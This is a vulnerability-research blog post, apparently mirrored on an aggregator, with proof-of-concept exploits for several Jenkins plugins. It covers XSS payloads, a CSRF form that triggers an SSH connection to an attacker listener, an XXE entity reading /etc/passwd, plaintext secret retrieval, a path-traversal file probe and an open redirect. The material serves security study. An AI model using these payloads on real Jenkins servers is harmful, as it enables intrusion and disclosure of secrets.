4

Jenkins - Vulnerabilities analysis part 4

 2 years ago
source link: https://liodeus.github.io/2022/03/20/Jenkins-Vulnerabilities-analysis-part-4.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Jenkins - Vulnerabilities analysis part 4

March 20th, 2022

This is still in redaction. I’ll add more content when I have found plugins vulnerable and can reproduce the vulnerability. The exploit part will be more verbose, for now that will do :)

The docker image, which will be the lab, with all the plugins already installed, will be available soon.

Search for vulnerable plugins :

Stored XSS vulnerability in Dashboard View Plugin

Exploit

  • New view - name it - select dashboard
  • add a Portlets at the top of the page
  • Iframe source url –> javascript:alert(“Liodeus”)

Reflected XSS vulnerability in Wall Display Master Project Plugin

Exploit

  • click Wall Display
  • customTheme=</style><script>alert("Liodeus")</script>

CSRF vulnerability in Publish Over SSH Plugin

  • CVE-2022-23111
    • Publish Over SSH Plugin 1.22
    • https://plugins.jenkins.io/publish-over-ssh/
    • Requires Jenkins 2.263.1

Exploit

  • sudo netcat -lvnp 22
  • host this html on a webpage (change the IP by yours)
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8080/descriptorByName/jenkins.plugins.publish_over_ssh.BapSshHostConfiguration/testConnection">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="hostname" value="192.168.1.117" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="port" value="22" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Go to the webpage, click on the button Submit request
  • If you already are connected to Jenkins, you should see a connection on your listener
  • If you are not connected, Jenkins ask you to connect, then the request get executed and you should see a connection on your listener

XXE vulnerability in Performance Plugin

Exploit

  • Create a new freestyle project
  • Go on it - click Pom2Config
  • Craft a .xml with exploit
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "/etc/passwd" >]>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <description>&xxe;</description>
</project>

Secret stored in plain text

Client Secret stored in plain text by GitLab Authentication Plugin

Exploit

  • Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin
  • Client ID –> ThisIsASecretID
  • Client Secret –> ThisIsASecretPASSWORD
  • docker ps - get docker:dind name
  • docker exec -it pensive_shannon /bin/bash
  • cd /var/jenkins_home
  • cat config.xml
  • Secret in plain text

Path traversal

Path traversal vulnerability in Publish Over SSH Plugin

  • CVE-2022-23113
    • Publish Over SSH Plugin 1.22
    • https://plugins.jenkins.io/publish-over-ssh/
    • Requires Jenkins 2.263.1

Exploit

  • Manage Jenkins - Configure System - Go to “Publish over SSH”
  • In the “Path to key” box, enter a file to check for existance
  • If the file doesn’t exist on the system : No such file : ‘fileName’
  • If the file exist : No error

Bonus

Open redirect vulnerability in GitLab Authentication Plugin

Exploit

  • Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin
  • GitLab Web URI –> URL
  • Go to localhost:8080
  • You are redirect to URL

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK